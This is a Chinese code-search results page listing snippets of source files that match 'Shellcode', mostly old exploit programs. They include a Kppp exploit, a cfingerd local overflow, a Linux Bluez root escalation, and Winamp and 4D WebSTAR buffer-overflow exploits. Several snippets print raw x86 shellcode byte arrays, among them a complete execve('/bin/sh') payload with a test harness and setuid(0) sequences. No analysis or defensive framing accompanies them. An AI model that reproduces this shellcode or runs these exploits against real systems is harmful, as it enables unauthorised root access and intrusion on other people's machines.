代码搜索:Shellcode

找到约 263 项符合「Shellcode」的源代码

代码结果 263
www.eeworm.com/read/101671/15822383

c kppp.c

/* * exploit.c Linux/Intel Kppp 1.1.2 and below * Re-Copyright (C) 2001 Doom *
www.eeworm.com/read/101671/15822418

pl cfingerd-exploit.pl

#!/usr/bin/perl # | Local buffer overflow exploit for cfingerd # | Copyright (c) 2001 by # | All rights reserved. # | # | Simple exploit for the vulnerability reported # | to
www.eeworm.com/read/422212/10655248

cpp test.cpp

#include #include char shellcode[] = "\x41\x41\x41\x41" "\x41\x41\x41\x41" "\x41\x41\x41\x41" "\x12\x45\xfa\x7f" "\x55\x8b\xec\x33\xc0\x50\x50\x50\xc6\x45\xf4\x4d\x
www.eeworm.com/read/159132/10692382

c testsc2.c

char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; voi
www.eeworm.com/read/159132/10692394

c test.c

char shellcode[] = "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69" "\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"; int main() { __asm__("call shellcode"); }
www.eeworm.com/read/159132/10692414

c stackexploit3.c

#include char shellcode[]= "\x31\xdb" "\x89\xd8" "\xb0\x17" "\xcd\x80" "\x31\xdb" "\x89\xd8" "\xb0\x17" "\xcd\x80" "\x31\xdb" "\x89\xd8" "\xb0\x2e" "\xcd\x80"
www.eeworm.com/read/159132/10692423

c stackexploit2.c

#include #include #include char shellcode[]= "\x31\xdb" "\x89\xd8" "\xb0\x17" "\xcd\x80" "\x31\xdb" "\x89\xd8" "\xb0\x17" "\xcd\x80" "\x31\xdb
www.eeworm.com/read/439530/7119144

txt linux kernel 2.4 2.6 bluez local root privilege escalation exploit (update).txt

/* Due to many responses i've improved the exploit to cover more systems! ONG_BAK v0.9 [october 24th 05] """""""""""""""""""""""""""""""""""" o universal "shellcode" added o try to use
www.eeworm.com/read/253602/12210202

txt winampm3u_c.txt

/* Credits go to the author How to fix and study the bug: * - The cdda library only reserves 20 bytes for names when files are "*.cda" * - run Winamp with ollye * - when loaded locate and
www.eeworm.com/read/253602/12210232

txt 4d webstar tomcat plugin remote buffer overflow exploit.txt

/* 4d buffer overflow Braden Thomas the buffer is copied byte by byte starting from the beginning of the buffer until a NULL byte is reached (or a couple other types of bytes) the buffer is cop